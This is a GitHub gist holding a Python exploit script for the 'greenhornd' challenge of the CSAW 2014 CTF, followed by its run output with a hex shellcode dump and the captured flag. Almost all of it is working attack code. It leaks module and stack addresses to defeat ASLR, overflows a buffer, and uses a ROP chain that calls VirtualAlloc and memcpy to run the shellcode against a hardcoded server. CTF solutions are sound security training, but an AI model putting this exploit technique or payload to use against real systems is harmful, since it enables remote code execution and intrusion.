Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit greenhornd CSAW 2014 CTF
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#greenhorn exploit
offset_data = 0x3F8
s = NullSocket("54.164.253.42", 9998)
s.readuntil("Password: ")
s.writeline("GreenhornSecretPassword!!!")
s.readuntil("Selection: ")
s.writeline("a\n")
s.readuntil("is: 0x")
leak_module = int(s.read(8), 16)
print '[!] leak module: 0x%08X' % leak_module
s.readuntil("at: 0x")
leak_stack = int(s.read(8), 16)
print '[!] leak stack: 0x%08X' % leak_stack
s.readuntil("Selection: ")
s.writeline("V")
s.readuntil("(with some constraints).\n\n")
address_clean_4args = leak_module + 0x0040199e
address_payload = leak_stack - offset_data
address_new_ebp = address_payload + 0x500
shellcode = open('scgreen', 'rb').read()
print '[!] Shellcode: ' + shellcode.encode('hex')
shellcode = shellcode.replace("\xD0\x14\x40\x00", pack(leak_module + 0x0401460))
payload = "CSAW"
payload += ("\x90" * 32) + shellcode
payload += "A" * (0x400 - len(payload))
payload += pack(address_new_ebp) #new ebp
###call VirtualAlloc
payload += pack(leak_module + 0x004011C0) # call ds:VirtualAlloc
payload += pack(address_clean_4args)
payload += pack(0) #lpAddress
payload += pack(0x1000) #size
payload += pack(0x40) #flprotect
payload += pack(address_new_ebp + 0x8) #void *
###restore ebp
payload += pack(leak_module + 0x00401512) #pop ebp; retn
payload += pack(address_new_ebp)
###call memcpy
payload += pack(leak_module + 0x004011F3) #push args from ebp and call memcpy
payload += pack(address_new_ebp) #still ebp
###call shellcode
payload += pack(leak_module + 0x00401C75) #pop esi
payload += pack(address_new_ebp + 0x08)
payload += pack(leak_module + 0x00401C65) #mov eax, [esi] ... call eax
payload += "B" * (0x500 - len(payload))
payload += "CCCC"
payload += "DDDD"
###args for memcpy
payload += "EEEE" #ebp + 0x8
payload += pack(address_payload + 4) #ebp + 0xC = address_shellcode
payload += pack(0x200) #ebp +0x10
s.writeline(payload)
print s.readuntil("}")
'''
$ python green.py
[!] leak module: 0xFFE50000
[!] leak stack: 0x001EF49C
[!] Shellcode: e8000000005b8db389010000568db38101000056680200000068884e0d00e86a0000006800000000688000000068030000006800000000680100000068000000808d839101000050ff93890100008985f8fbffff68000000008d85fcfbffff5068000100008d8500fcffff508b85f8fbffff50ff938d0100008d8500fcffff680001000050b8d0144000ffd0c35589e55156578b4d0c8b75108b7d14ff36ff7508e819000000890781c70400000081c604000000e2e65f5e5989ec5dc210005589e55356575164ff3530000000588b400c8b480c8b118b413068020000008b7d085750e86a00000085c0740789d1e9e1ffffff8b4118508b583c01d88b5878585001c38b4b1c8b53208b5b2401c101c201c38b32585001c66801000000ff750c56e82c00000085c0741181c20400000081c302000000e9d7ffffff5831d2668b13c1e20201d10301595f5e5b89ec5dc208005589e551535231c931db31d28b45088a1080ca6001d3d1e30345108a0884c9e0ee31c08b4d0c39cb7401405a5b5989ec5dc20c004677060062d5000000000000000000006b657900
key{He may be angry all the time, but he's the only one that understand Windows DACLs}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.